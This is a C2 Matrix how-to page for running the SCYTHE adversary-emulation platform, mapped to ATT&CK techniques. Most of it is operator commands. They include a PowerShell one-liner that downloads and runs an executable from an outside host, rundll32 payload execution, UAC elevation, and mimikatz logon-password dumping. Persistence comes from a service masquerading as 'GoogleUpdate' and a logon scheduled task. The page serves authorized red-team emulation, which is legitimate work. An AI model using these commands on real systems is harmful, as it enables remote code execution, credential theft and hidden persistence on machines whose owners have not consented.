C2 Matrix
Search…
SCYTHE

Setup Campaign

Login to your SCYTHE instance via web browser. Default port is 8443.
Campaign Manager - New Campaign
Select the following options:
  • Name: unique name for the campaign
  • Target Operating System: Windows, Linux, or macOS
  • Restrict Campaign through Execution Guardrails (T1480) by Device, Domain, Start Date, and/or End Date
  • Communication Module:
    • HTTPS is default,
    • DNS, HTTP, and Stego require relays to be installed on redirector
    • Google Sheet and Twitter require third party account/API

Community Threats (Third Party Adversary Emulation Plans)

Download Community Threats from SCYTHE Github: https://github.com/scythe-io/community-threats
Import into SCYTHE: Threat Manager - Migrate Threats - Choose File - Import
Migrate Threats
Use a Threat: Threat Manager - Threat Catalog - Click Threat - Create Campaign from Threat

Deploy Payload

User Execution: Malicious File (T1204.002):

Download the binary to the target system and execute by double clicking.

Signed Binary Proxy Execution: Rundll32 (T1218.011):

Download DLL file from SCYTHE and execute below from a cmd.exe:
rundll32.exe ServiceLogin.dll,PlatformClientMain

Command and Scripting Interpreter: PowerShell (T1059.001)

Open a powershell.exe and run:
$myscriptblock={$url="https://madrid.scythedemo.com/ServiceLogin?active=K17coQ7Y6E-jJExc8Y_-8w&b=false";$wc=New-Object System.Net.WebClient;$output="C:\Users\Public\scythe_payload.exe";$wc.DownloadFile($url,$output);C:\Users\Public\scythe_payload.exe};Invoke-Command -ScriptBlock $myscriptblock;

Emulate TTPs

loader --load run
run whoami
run cmd /c whoami

Load Python Runtime

loader --load-runtime python3
list modules
loader --load "modulename"
"modulename"

Download files

Move file to virtual file system
loader --load downloader
downloader --src VFS:/users/BUILTIN/scythe/DNS_scythe_client32.dll --dest C:\Users\sec564\DNS_scythe_client32.dll

Privilege Escalation (TA0004)

UAC (T1088)

loader --load elevate
elevate --prompt

Credential Access (TA0006)

Credential Dumping (T1003)

loader --load mimikatz
mimikatz --arglist privilege::debug
mimikatz --arglist sekurlsa::logonPasswords

Persistence (TA0003)

New Service (T1050)

loader --load persist
Synatax:
persist --hostname "Hostname" --name "Name of Service" --display "Display Name of Service" --description mysvc --path \\"hostname"\C$\"location"
Example:
persist --hostname WIN10-VICTIM1 --name GoogleUpdate --display GoogleUpdate --description GoogleUpdate --path \\WIN10-VICTIM1\C$\Windows\Temp\GoogleUpdate.exe

Scheduled Task (T1168)

schtasks /create /tn DNS /sc ONLOGON /tr "cmd.exe /k rundll32.exe C:\Users\\DNS_scythe_client32.dll,PlatformClientMain"

Clean up

Persistence:

run sc delete GoogleUpdate
run del C:\Windows\Temp\GoogleUpdate.exe

Kill agent:

controller --shutdown
Copy link
On this page
Setup Campaign
Community Threats (Third Party Adversary Emulation Plans)
Deploy Payload
User Execution: Malicious File (T1204.002):
Signed Binary Proxy Execution: Rundll32 (T1218.011):
Command and Scripting Interpreter: PowerShell (T1059.001)
Emulate TTPs
Load Python Runtime
Download files
Privilege Escalation (TA0004)
Credential Access (TA0006)
Persistence (TA0003)
Clean up
Persistence:
Kill agent: